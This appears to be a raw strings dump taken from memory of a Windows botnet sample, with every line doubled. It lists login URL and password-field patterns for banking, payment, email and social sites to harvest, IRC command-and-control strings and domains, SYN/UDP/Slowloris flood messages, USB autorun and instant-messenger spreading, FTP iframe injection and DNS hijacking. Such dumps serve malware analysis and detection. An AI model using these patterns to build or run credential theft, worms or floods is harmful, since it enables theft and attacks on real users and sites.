*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
\??\%System%\csrss.exe
\??\%System%\csrss.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe
\Device\HarddiskVolume1\WINDOWS\system32\csrss.exe
c:\%original file name%.exe
c:\%original file name%.exe
winlogon.exe_712_rwx_015F0000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0`
tlSSSSSSSSSShL0`
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
%s-Mutex
%s-Mutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
{%s|%s%s}%s
{%s|%s%s}%s
n%s{%s|%s%s}%s
n%s{%s|%s%s}%s
%s|%s|%s
%s|%s|%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
icon=shell32.dll,7
icon=shell32.dll,7
shellexecute=
shellexecute=
%windir%\system32\cmd.exe
%windir%\system32\cmd.exe
&&%%windir%%\explorer.exe %Í%%%s
&&%%windir%%\explorer.exe %Í%%%s
/c "start %Í%%RECYCLER\%s
/c "start %Í%%RECYCLER\%s
\\.\%c:
\\.\%c:
%s\%s
%s\%s
%sautorun.tmp
%sautorun.tmp
%sautorun.inf
%sautorun.inf
%0x.exe
%0x.exe
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
*vkontakte.ru/api.php
*facebook.*/ajax/*MessageComposerEndpoint.php*
*facebook.*/ajax/*MessageComposerEndpoint.php*
msg_text
msg_text
*facebook.*/ajax/chat/send.php*
*facebook.*/ajax/chat/send.php*
-_.!~*'()
-_.!~*'()
%s.%s hijacked!
%s.%s hijacked!
MSG %d %s %d
MSG %d %s %d
MSG %d %1s
MSG %d %1s
SDG %d %d
SDG %d %d
Content-Length: %d
Content-Length: %d
SDG %d
SDG %d
%s_0xX
%s_0xX
RegCreateKeyExW
RegCreateKeyExW
RegCreateKeyExA
RegCreateKeyExA
URLDownloadToFileW
URLDownloadToFileW
URLDownloadToFileA
URLDownloadToFileA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestA
HttpSendRequestA
NtEnumerateValueKey
NtEnumerateValueKey
DNSAPI.dll
DNSAPI.dll
Secur32.dll
Secur32.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
HttpQueryInfoA
HttpQueryInfoA
InternetOpenUrlA
InternetOpenUrlA
HttpQueryInfoW
HttpQueryInfoW
WININET.dll
WININET.dll
SHLWAPI.dll
SHLWAPI.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
GetProcessHeap
GetProcessHeap
ConnectNamedPipe
ConnectNamedPipe
CreateNamedPipeA
CreateNamedPipeA
DisconnectNamedPipe
DisconnectNamedPipe
GetWindowsDirectoryW
GetWindowsDirectoryW
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
mom002.net
mom002.net
mom003.net
mom003.net
mom004.net
mom004.net
]1.1.0.0
]1.1.0.0
msn.set
msn.set
msn.int
msn.int
http.set
http.set
http.int
http.int
http.inj
http.inj
logins
logins
PASS %s
PASS %s
[.ShellClassInfo]
[.ShellClassInfo]
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
CLSID={645FF040-5081-101B-9F08-00AA002F954E}
USER %s 0 0 :%s
USER %s 0 0 :%s
NICK %s
NICK %s
JOIN %s %s
JOIN %s %s
PART %s
PART %s
PRIVMSG %s :%s
PRIVMSG %s :%s
QUIT :%s
QUIT :%s
PONG %s
PONG %s
[v="%s" c="%s" h="%s" p="%S"]
[v="%s" c="%s" h="%s" p="%S"]
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Starting flood on "%s" for %d minute(s)
[Slowloris]: Finished flood on "%s"
[Slowloris]: Finished flood on "%s"
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Starting flood on "%s:%d" for %d second(s)
[UDP]: Finished flood on "%s:%d"
[UDP]: Finished flood on "%s:%d"
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Starting flood on "%s:%d" for %d second(s)
[SYN]: Finished flood on "%s:%d"
[SYN]: Finished flood on "%s:%d"
[USB]: Infected %s
[USB]: Infected %s
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread message to "%s"
[MSN]: Updated MSN spread interval to "%s"
[MSN]: Updated MSN spread interval to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Updated HTTP spread message to "%s"
[HTTP]: Injected value is now %s.
[HTTP]: Injected value is now %s.
[HTTP]: Updated HTTP spread interval to "%s"
[HTTP]: Updated HTTP spread interval to "%s"
[Visit]: Visited "%s"
[Visit]: Visited "%s"
[DNS]: Blocked "%s"
[DNS]: Blocked "%s"
[usb="%d" msn="%d" http="%d" total="%d"]
[usb="%d" msn="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[ftp="%d" pop="%d" http="%d" total="%d"]
[RSOCK4]: Started rsock4 on "%s:%d"
[RSOCK4]: Started rsock4 on "%s:%d"
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error downloading file [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s"] Error writing download to "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d="%s"] Error getting temporary filename. [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[d='%s"] Error getting application data path [e="%d"]
[Visit]: Error visitng "%s"
[Visit]: Error visitng "%s"
[FTP Login]: %s
[FTP Login]: %s
[POP3 Login]: %s
[POP3 Login]: %s
[FTP Infect]: %s was iframed
[FTP Infect]: %s was iframed
[HTTP Login]: %s
[HTTP Login]: %s
[HTTP Traffic]: %s
[HTTP Traffic]: %s
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected File: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected DNS: "%s"
[Ruskill]: Detected Reg: "%s"
[Ruskill]: Detected Reg: "%s"
[PDef ]: %s
[PDef ]: %s
[DNS]: Blocked DNS "%s"
[DNS]: Blocked DNS "%s"
[MSN]: %s
[MSN]: %s
[HTTP]: %s
[HTTP]: %s
ftplog
ftplog
ftpinfect
ftpinfect
httplogin
httplogin
httptraff
httptraff
httpspread
httpspread
http://api.wipmania.com/
http://api.wipmania.com/
\\.\pipe\x_ipc
\\.\pipe\x_ipc
\\.\pipe\e621ca05
\\.\pipe\e621ca05
\??\%System%\winlogon.exe
\??\%System%\winlogon.exe
%WinDir%
%WinDir%
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
%Documents and Settings%\%current user%\Application Data\Rukmkd.exe
7 767<7~7
7 767<7~7
8*808;8~8
8*808;8~8
\\.\pipe
\\.\pipe
Internet Explorer\iexplore.exe
Internet Explorer\iexplore.exe
autorun.inf
autorun.inf
pidgin.exe
pidgin.exe
wlcomm.exe
wlcomm.exe
msnmsgr.exe
msnmsgr.exe
msmsgs.exe
msmsgs.exe
flock.exe
flock.exe
opera.exe
opera.exe
chrome.exe
chrome.exe
ieuser.exe
ieuser.exe
iexplore.exe
iexplore.exe
firefox.exe
firefox.exe
.ipconfig.exe
.ipconfig.exe
verclsid.exe
verclsid.exe
regedit.exe
regedit.exe
rundll32.exe
rundll32.exe
cmd.exe
cmd.exe
regsvr32.exe
regsvr32.exe
l"%s" %S
l"%s" %S
lol.exe
lol.exe
n127.0.0.1
n127.0.0.1
%s:Zone.Identifier
%s:Zone.Identifier
wininet.dll
wininet.dll
secur32.dll
secur32.dll
ws2_32.dll
ws2_32.dll
:%S%S\Desktop.ini
:%S%S\Desktop.ini
winlogon.exe
winlogon.exe
explorer.exe
explorer.exe
Aadvapi32.dll
Aadvapi32.dll
urlmon.dll
urlmon.dll
nspr4.dll
nspr4.dll
Akernel23.dll
Akernel23.dll
y%s\%s.exe
y%s\%s.exe
lsass.exe
lsass.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System
Software\Microsoft\Windows\CurrentVersion\Policies\System
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe
\Device\HarddiskVolume1\WINDOWS\system32\winlogon.exe
c:\%original file name%.exe
c:\%original file name%.exe
services.exe_756_rwx_00B60000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
